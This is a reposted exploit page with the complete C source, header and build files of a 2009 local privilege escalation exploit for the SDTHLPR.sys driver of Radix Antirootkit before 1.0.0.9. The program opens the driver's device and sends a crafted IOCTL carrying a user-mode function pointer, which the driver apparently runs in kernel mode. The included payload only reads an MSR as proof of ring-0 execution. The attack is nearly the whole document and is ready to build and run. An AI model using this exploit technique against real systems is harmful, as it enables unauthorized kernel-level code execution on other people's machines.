Radix Antirootkit < 1.0.0.9 (SDTHLPR.sys) Privilege Escalation Exploit
来源:http://www.ntinternals.org/ 作者:alex 发布时间:2009-08-25  

-------------------------SdtHelper_Exp.c----------------------------

////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | Usec.at - http://www.usec.at/                                              | //
// |                                                                            | //
// | Affected Software:                                                         | //
// | Radix Antirootkit < 1.0.0.9                                                | //
// |                                                                            | //
// | Affected Driver:                                                           | //
// | SDTHLPR.sys                                                                | //
// |                                                                            | //
// | Local Privilege Escalation Exploit                                         | //
// | For Educational Purposes Only !                                            | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | NT Internals - http://www.ntinternals.org/                                 | //
// | alex ntinternals org                                                       | //
// | 21 August 2009                                                             | //
// |                                                                            | //
// | References:                                                                | //
// | Radix Antirootkit Multiple Privilege Escalation Vulnerabilities            | //
// | NTIADV0903 - http://www.ntinternals.org/ntiadv0903/ntiadv0903.html         | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "SdtHelper_Exp.h"

// Control code accepted by SDTHLPR.sys on \Device\SdtHelper. Decoding it with the
// CTL_CODE layout gives device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x30,
// METHOD_BUFFERED, FILE_READ_ACCESS -- so a handle opened with FILE_READ_DATA
// (what main() asks for) is already sufficient to reach the handler.
#define IOCTL_CALL_RING0 0x002240C0
// Byte length of the two-ULONG input buffer main() passes with the IOCTL
// ({function pointer, argument}); correct only for a 32-bit build.
#define INPUT_BUFFER_LENGTH 0x08

// MSR index of IA32_SYSENTER_EIP. RDMSR is a CPL-0 instruction, so a successful
// read is the proof that Ring0ShellCode really ran in kernel mode.
#define IA32_SYSENTER_EIP 0x176

// Written by Ring0ShellCode while executing in kernel mode, printed by main().
ULONG Ia32SysenterEip;

// Payload whose address main() hands to the driver in InputBuffer[0]; the driver
// is expected to call it at ring 0. The two parameters are kept because the
// IOCTL contract presumably supplies them (InputBuffer[1] looks like the second
// one) -- nothing here uses them.
//
// This is a proof of kernel-mode execution, not a privilege change: RDMSR faults
// (#GP) at CPL > 0, so obtaining IA32_SYSENTER_EIP (MSR 0x176) demonstrates the
// pointer was invoked from kernel mode. The value is parked in a user-mode
// global, which works here presumably because the IOCTL is dispatched in the
// calling process's context. NOTE(review): on hardware/OS combinations with
// SMEP the kernel cannot execute user pages at all, so this technique is tied
// to the era of the affected product -- confirm against the target.
NTSTATUS Ring0ShellCode(ULONG Parameter1, ULONG Parameter2)
{
    (void)Parameter1;
    (void)Parameter2;

    __asm
    {
        xor edx, edx                 // RDMSR overwrites EDX anyway; kept so EDX is deterministic
        mov ecx, IA32_SYSENTER_EIP   // ECX selects the MSR to read
        rdmsr                        // EDX:EAX <- MSR[ECX]; only the low dword is of interest
        mov Ia32SysenterEip, eax
    }

    return 0;   // STATUS_SUCCESS, should the driver propagate the callee's return value
}

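// Entry point. Opens the SDTHLPR.sys control device, then issues IOCTL_CALL_RING0
// with an input buffer whose first ULONG is the address of Ring0ShellCode. The
// driver presumably calls that user-supplied pointer in kernel mode without
// validating it (the vulnerability); if so, Ring0ShellCode's RDMSR succeeds and
// the MSR value it stored in Ia32SysenterEip is printed as proof of ring-0
// execution. No privileges are changed by this program itself.
//
// Assumptions visible in the code: a 32-bit process (the function pointer is
// passed as a ULONG) and a \Device\SdtHelper object that the current user may
// open for FILE_READ_DATA | FILE_WRITE_DATA.
//
// Fixes relative to the original: RtlFreeUnicodeString is no longer called on a
// string whose Buffer points at a literal (that routine frees Buffer to the
// process heap and is only valid for Rtl-allocated strings), the device-open
// retry loop sleeps instead of spinning and reports the failing status, and the
// device handle is closed when the IOCTL fails.
//
// Returns 0 on success, otherwise the failing NTSTATUS (converted to int).
int __cdecl main(int argc, char **argv)
{
    NTSTATUS NtStatus;
    NTSTATUS LastOpenStatus = 0;

    HANDLE DeviceHandle = NULL;

    UNICODE_STRING DeviceName;
    OBJECT_ATTRIBUTES ObjectAttributes;
    IO_STATUS_BLOCK IoStatusBlock;
    LARGE_INTEGER Interval;
    ULONG InputBuffer[2];

    (void)argc;
    (void)argv;

    ///////////////////////////////////////////////////////////////////////////////////////////////

    system("cls");

    printf( " +----------------------------------------------------------------------------+\n"
            " |                                                                            |\n"
            " | Usec.at - http://www.usec.at/                                              |\n"
            " |                                                                            |\n"
            " | Affected Software:                                                         |\n"
            " | Radix Antirootkit < 1.0.0.9                                                |\n"
            " |                                                                            |\n"
            " | Affected Driver:                                                           |\n"
            " | SDTHLPR.sys                                                                |\n"
            " |                                                                            |\n"
            " | Local Privilege Escalation Exploit                                         |\n"
            " | For Educational Purposes Only !                                            |\n"
            " |                                                                            |\n"
            " +----------------------------------------------------------------------------+\n"
            " |                                                                            |\n"
            " | NT Internals - http://www.ntinternals.org/                                 |\n"
            " | alex ntinternals org                                                       |\n"
            " | 21 August 2009                                                             |\n"
            " |                                                                            |\n"
            " | References:                                                                |\n"
            " | Radix Antirootkit Multiple Privilege Escalation Vulnerabilities            |\n"
            " | NTIADV0903 - http://www.ntinternals.org/ntiadv0903/ntiadv0903.html         |\n"
            " |                                                                            |\n"
            " +----------------------------------------------------------------------------+\n\n");

    ///////////////////////////////////////////////////////////////////////////////////////////////

    // One second as a relative interval for NtDelayExecution: negative, in
    // 100 ns units (0xFFFFFFFFFF676980 == -10,000,000). Used both for the
    // open-retry pause and for the countdown below.
    Interval.LowPart = 0xFF676980;
    Interval.HighPart = 0xFFFFFFFF;

    // RtlInitUnicodeString only points Buffer at the literal; nothing is
    // allocated, so there is nothing to free afterwards.
    RtlInitUnicodeString(&DeviceName, L"\\Device\\SdtHelper");

    ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
    ObjectAttributes.RootDirectory = NULL;
    ObjectAttributes.ObjectName = &DeviceName;
    ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
    ObjectAttributes.SecurityDescriptor = NULL;
    ObjectAttributes.SecurityQualityOfService = NULL;

    printf(" [+] Waiting for Device Handle...\n\n");

    // Poll until the device can be opened (e.g. until Radix loads its driver).
    // Pause between attempts rather than spinning, and print the status each
    // time it changes so a permanently absent device is visible to the user.
    for (;;)
    {
        NtStatus = NtCreateFile(
              &DeviceHandle,                      // FileHandle
              FILE_READ_DATA | FILE_WRITE_DATA,   // DesiredAccess (IOCTL only needs FILE_READ_ACCESS)
              &ObjectAttributes,                  // ObjectAttributes
              &IoStatusBlock,                     // IoStatusBlock
              NULL,                               // AllocationSize OPTIONAL
              0,                                  // FileAttributes
              FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
              FILE_OPEN_IF,                       // CreateDisposition
              0,                                  // CreateOptions
              NULL,                               // EaBuffer OPTIONAL
              0);                                 // EaLength

        if (DeviceHandle != NULL)
            break;

        if (NtStatus != LastOpenStatus)
        {
            printf(" [*] NtStatus of NtCreateFile - 0x%.8X (retrying)\n", NtStatus);
            LastOpenStatus = NtStatus;
        }

        NtDelayExecution(FALSE, &Interval);
    }

    ///////////////////////////////////////////////////////////////////////////////////////////////

    // Cosmetic countdown; flush so the partial line is visible even if stdout
    // happens to be buffered.
    printf(" [+] 3");
    fflush(stdout);
    NtDelayExecution(FALSE, &Interval);

    printf(" 2");
    fflush(stdout);
    NtDelayExecution(FALSE, &Interval);

    printf(" 1");
    fflush(stdout);
    NtDelayExecution(FALSE, &Interval);

    printf(" Hoop...\n\n");
    fflush(stdout);
    NtDelayExecution(FALSE, &Interval);

    // Input layout the driver appears to expect: [0] = address to call,
    // [1] = argument handed to it (unused by our payload). Casting the function
    // pointer to ULONG is why this is a 32-bit-only program.
    InputBuffer[0] = (ULONG)Ring0ShellCode;
    InputBuffer[1] = 0;

    NtStatus = NtDeviceIoControlFile(
                                     DeviceHandle,
                                     NULL,
                                     NULL,
                                     NULL,
                                     &IoStatusBlock,
                                     IOCTL_CALL_RING0,
                                     InputBuffer,
                                     sizeof(InputBuffer),   // == INPUT_BUFFER_LENGTH
                                     NULL,
                                     0);

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
        NtClose(DeviceHandle);   // do not leak the device handle on the failure path
        return NtStatus;
    }

    // Non-zero here means Ring0ShellCode executed RDMSR successfully, i.e. in ring 0.
    printf(" [+] IA32_SYSENTER_EIP (0x176) - 0x%.8X\n", Ia32SysenterEip);

    NtStatus = NtClose(DeviceHandle);

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    return 0;
}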

----------------------------SdtHelper_Exp.h---------------------------------------

// Decorations for the ntdll.dll exports declared below (the program links
// against ntdll.lib, see the `sources` file): __stdcall, imported from a DLL.
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

// Object-manager and NtCreateFile constants not provided by windows.h.
#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003

// NOTE(review): the Windows SDK defines NTSTATUS as a signed LONG; unsigned is
// harmless here because every caller only tests the value for != 0 and prints
// it with %X, but it would break NT_SUCCESS-style sign tests if added later.
typedef ULONG NTSTATUS;

// Native counted string, laid out to match ntdll's expectations (byte offsets
// in the field comments). main() initialises one with RtlInitUnicodeString,
// which makes Buffer point at a string literal rather than heap memory.
typedef struct _UNICODE_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PWSTR Buffer;
    /* 0x08 */
}
    UNICODE_STRING,
  *PUNICODE_STRING,
**PPUNICODE_STRING;

// Name/flags bundle passed to NtCreateFile (32-bit layout, byte offsets in the
// field comments). main() fills every field explicitly: Length = sizeof,
// ObjectName = the device name, Attributes = OBJ_CASE_INSENSITIVE, rest NULL.
typedef struct _OBJECT_ATTRIBUTES
{
    /* 0x00 */ ULONG Length;
    /* 0x04 */ HANDLE RootDirectory;
    /* 0x08 */ PUNICODE_STRING ObjectName;
    /* 0x0C */ ULONG Attributes;
    /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
    /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
    /* 0x18 */
}
    OBJECT_ATTRIBUTES,
  *POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

// Completion record written by NtCreateFile / NtDeviceIoControlFile. The anonymous
// union overlays the final status with a pointer; main() never reads either field,
// it relies on the functions' return values instead.
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        /* 0x00 */ NTSTATUS Status;
        /* 0x00 */ PVOID Pointer;
    };

    /* 0x04 */ ULONG Information;
    /* 0x08 */
}
    IO_STATUS_BLOCK,
  *PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

// I/O completion APC callback type required by the NtDeviceIoControlFile
// prototype; main() passes NULL for it (synchronous use).
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

// Points DestinationString->Buffer at SourceString and sets the byte lengths;
// allocates nothing.
IMP_VOID RtlInitUnicodeString
(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

// Releases UnicodeString->Buffer to the process heap. Intended for strings
// produced by the Rtl conversion/allocation routines -- calling it on a string
// set up by RtlInitUnicodeString over a literal hands a non-heap pointer to the
// heap free routine.
IMP_VOID RtlFreeUnicodeString
(
    IN PUNICODE_STRING UnicodeString
);

// Opens (or creates) the object named by ObjectAttributes; on success
// *FileHandle receives the handle. main() uses it to open \Device\SdtHelper.
IMP_SYSCALL NtCreateFile
(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
);

// Sends IoControlCode with InputBuffer/InputBufferLength to the driver behind
// FileHandle. main() calls it synchronously (Event/ApcRoutine/ApcContext NULL,
// no output buffer).
IMP_SYSCALL NtDeviceIoControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
);

// Sleeps for *Interval (negative = relative, 100 ns units; main() passes -1 s).
IMP_SYSCALL NtDelayExecution
(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER Interval
);

// Closes a kernel handle.
IMP_SYSCALL NtClose
(
    IN HANDLE Handle
);

--------------------------------------sources----------------------------------------

TARGETNAME=SdtHelper_Exp
TARGETPATH=obj
TARGETTYPE=PROGRAM
SOURCES=SdtHelper_Exp.c
UMTYPE=console
UMBASE=0x00400000
TARGETLIBS=$(DDK_LIB_PATH)\ntdll.lib

----------------------------------------makefile-------------------------------

!INCLUDE $(NTMAKEENV)\makefile.def

 


 